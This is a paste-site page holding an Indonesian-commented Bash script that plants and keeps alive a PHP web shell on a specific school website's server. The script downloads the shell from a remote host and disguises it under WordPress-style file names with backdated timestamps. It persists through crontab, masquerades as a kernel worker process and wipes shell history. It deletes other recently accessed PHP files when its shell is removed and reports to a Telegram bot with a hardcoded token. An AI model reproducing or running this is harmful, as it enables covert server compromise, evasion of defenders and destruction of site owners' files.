ZEVPASTER – Free Online Text Sharing

New Paste Browse

#!/bin/bash
# === Konfigurasi ===
RAW_SHELL_URL="https://s-kobam.direct/simpanan/bypas.txt"
BOT_TOKEN="8055391758:AAH5mmboDiNP8dcVK8827WrcEZrEbXxZmDs" # GANTI BOT TOKEN
CHAT_ID="1345261884" # GANTI ID TELEGRAM
FAKE_NAMES=(
  "index.php"
  "wp-config.php"
  "wp-login.php"
  "wp-admin.php"
  "wp-settings.php"
  "wp-load.php"
  "functions.php"
  "xmlrpc.php"
  "configuration.php"
  "administrator.php"
  "config.php"
  "install.php"
  "admin.php"
  "autoload.php"
  "settings.php"
  "db.php"
  "repair.php"
  "upload.php"
  "cmd.php"
  "test.php"
  "backup.php"
  "shell.php"
  "uploadify.php"
  "exploit.php"
  "functions.bak.php"
  "functions.old.php"
  "class.php"
  "class-wp.php"
  "wp-settings.bak.php"
  "wp-settings.old.php"
  "phpinfo.php"
  "info.php"
  "debug.php"
  "console.php"
  "session.php"
  "cache.php"
  "db_backup.php"
  "sql_dump.php"
  "uploads.php"
  "filemanager.php"
  "fileupload.php"
  "download.php")
TIMEOUT=10
POLL_INTERVAL=2
ROOT_DIR="/home/smkn2/public_html/"  # SET ROOT WEBSITE MANUAL

# Fungsi untuk generate tanggal acak (30 hari - 1 tahun yang lalu)
random_old_date() {
    local days_ago=$((RANDOM % 336 + 30)) 
    date -d "$days_ago days ago" +"%Y-%m-%d %H:%M:%S"
}

# Inisialisasi variabel
BASE_DIR="$(cd "$(dirname "$0")" && pwd)"
DOMAIN="${1%/}"
[ -z "$DOMAIN" ] && DOMAIN="http://$(hostname -f)/"

# Buat beberapa lokasi backup untuk script
TMP_PATH1="/tmp/$RANDOM_NAME1"
TMP_PATH2="/dev/shm/$RANDOM_NAME2"
TMP_PATH3="/var/tmp/$RANDOM_NAME3"

# Salin script ke beberapa lokasi
cp "$0" "$TMP_PATH1" 2>/dev/null
cp "$0" "$TMP_PATH2" 2>/dev/null
cp "$0" "$TMP_PATH3" 2>/dev/null

# Berikan permission eksekusi
chmod +x "$TMP_PATH1" 2>/dev/null
chmod +x "$TMP_PATH2" 2>/dev/null
chmod +x "$TMP_PATH3" 2>/dev/null

# Set timestamp lama untuk semua file backup
random_date=$(random_old_date)
touch -d "$random_date" "$TMP_PATH1" 2>/dev/null
touch -d "$random_date" "$TMP_PATH2" 2>/dev/null
touch -d "$random_date" "$TMP_PATH3" 2>/dev/null

# Tambahkan ke crontab untuk auto-restart dengan beberapa metode
(crontab -l 2>/dev/null; echo "@reboot $TMP_PATH1 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null
(crontab -l 2>/dev/null; echo "@reboot $TMP_PATH2 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null
(crontab -l 2>/dev/null; echo "@reboot $TMP_PATH3 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null

# Sembunyikan proses
renice 19 $$ >/dev/null 2>&1
exec -a "[kworker/0:1]" "$TMP_PATH1" "$DOMAIN" &

# Fungsi untuk mengirim pesan ke Telegram
kirim_telegram() {
    local message="$1"
    curl -s -m "$TIMEOUT" -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" \
        -d "chat_id=$CHAT_ID" \
        --data-urlencode "parse_mode=Markdown" \
        --data-urlencode "text=$message" >/dev/null
}

# Fungsi untuk menghitung hash file
get_file_hash() {
    local file="$1"
    [ -f "$file" ] && sha256sum "$file" 2>/dev/null | cut -d' ' -f1
}

# Fungsi untuk mendownload shell
download_shell() {
    local target="$1"
    curl -s -m "$TIMEOUT" -o "$target" "$RAW_SHELL_URL"
    chmod 444 "$target" 2>/dev/null
}

# Fungsi untuk mendapatkan timestamp file terlama di direktori
get_oldest_timestamp() {
    local dir="$1"
    local oldest
    oldest=$(find "$dir" -type f -printf '%T@ %p\n' 2>/dev/null | sort -n | head -n1 | awk '{print $1}')
    if [ -z "$oldest" ]; then
        date +%s
    else
        date -d "@$oldest" +"%Y-%m-%d %H:%M:%S"
    fi
}

# Fungsi untuk mendapatkan direktori yang bisa ditulis secara acak
get_random_writable_dir() {
    find "$ROOT_DIR" -type d -writable 2>/dev/null | shuf -n1
}

# Fungsi untuk mendapatkan informasi proses yang mencoba menghapus file
get_suspicious_processes() {
    local shell_dir="$1"
    local suspicious_info=""
    
    # Dapatkan proses yang sedang berjalan di direktori yang sama
    if command -v lsof >/dev/null 2>&1; then
        suspicious_info=$(lsof +D "$shell_dir" 2>/dev/null | grep -v "PID" | head -5 | awk '{printf "PID: %s, CMD: %s, USER: %s\n", $2, $1, $3}')
    fi
    
    # Jika tidak ada hasil dari lsof, coba dengan ps
    if [ -z "$suspicious_info" ] && command -v ps >/dev/null 2>&1; then
        suspicious_info=$(ps aux | grep -v grep | grep -E "(php|httpd|apache|nginx)" | head -5 | awk '{printf "PID: %s, CMD: %s, USER: %s\n", $2, $11, $1}')
    fi
    
    echo "$suspicious_info"
}

# Fungsi untuk mendapatkan file PHP yang baru saja diakses di direktori yang sama
get_recently_accessed_php_files() {
    local shell_dir="$1"
    local recent_php_files=""
    
    # Dapatkan file PHP yang baru saja diakses dalam 2 menit terakhir
    if command -v find >/dev/null 2>&1; then
        recent_php_files=$(find "$shell_dir" -type f -name "*.php" -amin -2 2>/dev/null | grep -v "$(basename "$SHELL_PATH")")
    fi
    
    echo "$recent_php_files"
}

# Fungsi untuk menghapus file PHP yang mencurigakan
delete_suspicious_php_files() {
    local shell_dir="$1"
    local deleted_files=""
    
    # Dapatkan file PHP yang baru saja diakses
    local suspicious_files=$(get_recently_accessed_php_files "$shell_dir")
    
    if [ -n "$suspicious_files" ]; then
        while IFS= read -r file; do
            # Hapus file jika bukan shell kita sendiri
            if [ "$file" != "$SHELL_PATH" ] && [ -f "$file" ]; then
                rm -f "$file" 2>/dev/null
                deleted_files="$deleted_files$file\n"
            fi
        done <<< "$suspicious_files"
    fi
    
    echo -e "$deleted_files"
}

# Fungsi untuk menyelamatkan shell
selamatkan_shell() {
    local trigger="$1"
    local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}"
    local random_dir
    random_dir=$(get_random_writable_dir)
    
    # Pastikan direktori ada dan bisa ditulis
    if [ -z "$random_dir" ]; then
        # Jika tidak ada direktori yang bisa ditulis, gunakan root dir
        random_dir="$ROOT_DIR"
    fi
    
    mkdir -p "$random_dir" 2>/dev/null
    local new_path="$random_dir/$random_name"
    
    # Download shell
    download_shell "$new_path"
    
    # Tunggu sebentar untuk memastikan file terdownload
    sleep 1
    
    # Periksa apakah file berhasil di-download
    if [ ! -f "$new_path" ]; then
        # Coba download lagi dengan metode alternatif
        wget -q -O "$new_path" "$RAW_SHELL_URL" 2>/dev/null
        chmod 444 "$new_path" 2>/dev/null
    fi
    
    # Set timestamp lama
    random_date=$(random_old_date)
    touch -d "$random_date" "$new_path" 2>/dev/null
    
    # Dapatkan hash
    SHELL_HASH=$(get_file_hash "$new_path")
    
    # Update path shell
    SHELL_PATH="$new_path"
    
    local ts=$(date +"%Y-%m-%d %H:%M:%S")
    local ip=$(curl -s --max-time 3 https://api.ipify.org || echo "unknown")
    local url="$DOMAIN${new_path#$ROOT_DIR}"
    
    # Dapatkan direktori shell lama (jika ada)
    local old_shell_dir=""
    if [ -n "$2" ]; then
        old_shell_dir="$2"
    fi
    
    # Hapus file PHP yang mencurigakan jika ada direktori lama
    local deleted_files=""
    if [ -n "$old_shell_dir" ] && [ -d "$old_shell_dir" ]; then
        deleted_files=$(delete_suspicious_php_files "$old_shell_dir")
    fi
    
    # Dapatkan informasi tentang proses yang mencoba menghapus shell
    local suspicious_processes=""
    if [ -n "$old_shell_dir" ] && [ -d "$old_shell_dir" ]; then
        suspicious_processes=$(get_suspicious_processes "$old_shell_dir")
    fi
    
    # Buat pesan notifikasi
    local message="⚠️ *Shell Dipindahkan! (Trigger: $trigger)*  
📁 Path: \`$new_path\`  
🌍 URL: \`$url\`  
🌐 IP: \`$ip\`  
🕒 Waktu: $ts"
    
    # Tambahkan informasi file yang dihapus jika ada
    if [ -n "$deleted_files" ]; then
        message="$message  
💥 *File PHP yang Dihapus Balik:*
\`\`\`
$deleted_files
\`\`\`"
    fi
    
    # Tambahkan informasi proses mencurigakan jika ada
    if [ -n "$suspicious_processes" ]; then
        message="$message  
🔍 *Proses Mencurigakan:*
\`\`\`
$suspicious_processes
\`\`\`"
    fi
    
    # Tambahkan pesan balasan
    message="$message  
🖕 *Siapa berani hapus, langsung hilang duluan!*"
    
    kirim_telegram "$message"
}

# Fungsi untuk deploy shell
deploy_shell() {
    local random_dir
    random_dir=$(get_random_writable_dir)
    
    # Pastikan direktori ada dan bisa ditulis
    if [ -z "$random_dir" ]; then
        # Jika tidak ada direktori yang bisa ditulis, gunakan root dir
        random_dir="$ROOT_DIR"
    fi
    
    mkdir -p "$random_dir" 2>/dev/null
    local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}"
    SHELL_PATH="$random_dir/$random_name"
    
    # Download shell
    download_shell "$SHELL_PATH"
    
    # Tunggu sebentar untuk memastikan file terdownload
    sleep 1
    
    # Periksa apakah file berhasil di-download
    if [ ! -f "$SHELL_PATH" ]; then
        # Coba download lagi dengan metode alternatif
        wget -q -O "$SHELL_PATH" "$RAW_SHELL_URL" 2>/dev/null
        chmod 444 "$SHELL_PATH" 2>/dev/null
    fi
    
    # Set timestamp lama
    random_date=$(random_old_date)
    touch -d "$random_date" "$SHELL_PATH" 2>/dev/null
    
    # Dapatkan hash
    SHELL_HASH=$(get_file_hash "$SHELL_PATH")
    
    local ts=$(date +"%Y-%m-%d %H:%M:%S")
    local url="$DOMAIN${SHELL_PATH#$ROOT_DIR}"
    local message="✅ *Shell berhasil dideploy!*  
📁 Path: \`$SHELL_PATH\`  
🌍 URL: \`$url\`  
🕒 Waktu: $ts"
    kirim_telegram "$message"
}

# Fungsi untuk memeriksa perubahan file
check_file_changes() {
    # Periksa keberadaan file
    if [ ! -f "$SHELL_PATH" ]; then
        # Simpan direktori lama untuk investigasi
        local old_shell_dir=$(dirname "$SHELL_PATH")
        selamatkan_shell "missing" "$old_shell_dir"
        return
    fi
    
    # Periksa permission
    local current_mode=$(stat -c "%a" "$SHELL_PATH" 2>/dev/null)
    if [ "$current_mode" != "444" ]; then
        # Simpan direktori lama untuk investigasi
        local old_shell_dir=$(dirname "$SHELL_PATH")
        selamatkan_shell "permission_changed" "$old_shell_dir"
        return
    fi
    
    # Periksa hash
    local current_hash=$(get_file_hash "$SHELL_PATH")
    if [ "$current_hash" != "$SHELL_HASH" ]; then
        # Simpan direktori lama untuk investigasi
        local old_shell_dir=$(dirname "$SHELL_PATH")
        selamatkan_shell "content_changed" "$old_shell_dir"
        return
    fi
}

# Fungsi untuk memeriksa integritas script itu sendiri
check_self_integrity() {
    # Periksa keberadaan file backup
    if [ ! -f "$TMP_PATH1" ] && [ ! -f "$TMP_PATH2" ] && [ ! -f "$TMP_PATH3" ]; then
        # Jika semua file backup hilang, coba restore dari dir asli
        if [ -f "$0" ]; then
            cp "$0" "$TMP_PATH1" 2>/dev/null
            chmod +x "$TMP_PATH1" 2>/dev/null
            touch -d "$random_date" "$TMP_PATH1" 2>/dev/null
        fi
    fi
    
    # Periksa apakah proses masih berjalan
    if ! pgrep -f "[kworker/0:1]" > /dev/null; then
        # Jika proses tidak berjalan, restart dari backup
        nohup "$TMP_PATH1" "$DOMAIN" >/dev/null 2>&1 &
        exit
    fi
}

# Fungsi untuk membersihkan diri sendiri
self_clean() {
    # Hapus file asli
    rm -f "$0" 2>/dev/null
    
    # Hapus history command
    history -c 2>/dev/null
    history -w 2>/dev/null
    
    # Hapus log
    rm -f ~/.bash_history 2>/dev/null
    rm -f ~/.zsh_history 2>/dev/null
    rm -f ~/.history 2>/dev/null
}

# Fungsi utama
main_loop() {
    # Bersihkan diri sendiri
    self_clean
    
    # Deploy shell pertama kali
    deploy_shell
    
    # Tunggu sebentar untuk memastikan shell terdeploy dengan benar
    sleep 2
    
    # Loop monitoring
    while true; do
        check_file_changes
        check_self_integrity
        sleep "$POLL_INTERVAL"
    done
}

# Jalankan fungsi utama
main_loop

Paste Settings

Paste Title : [Optional]

Paste Folder : [Optional]

Syntax Highlighting : [Optional]

Paste Expiration : [Optional]

Paste Status : [Optional]

Password : [Optional]

Description: [Optional]

Tags: [Optional]

Encrypt Paste (?)

You are currently not logged in, this means you can not edit or delete anything you paste. Sign Up or Login

Recent Pastes

Untitled
PHP | 1 | 12 minutes ago
Untitled
PHP | 3 | 1 hour ago
Untitled
PHP | 3 | 2 hours ago
Untitled
PHP | 3 | 2 hours ago
Untitled
PHP | 3 | 2 hours ago
Untitled
PHP | 9 | 5 hours ago
Untitled
PHP | 9 | 5 hours ago

Paste Settings

Site Languages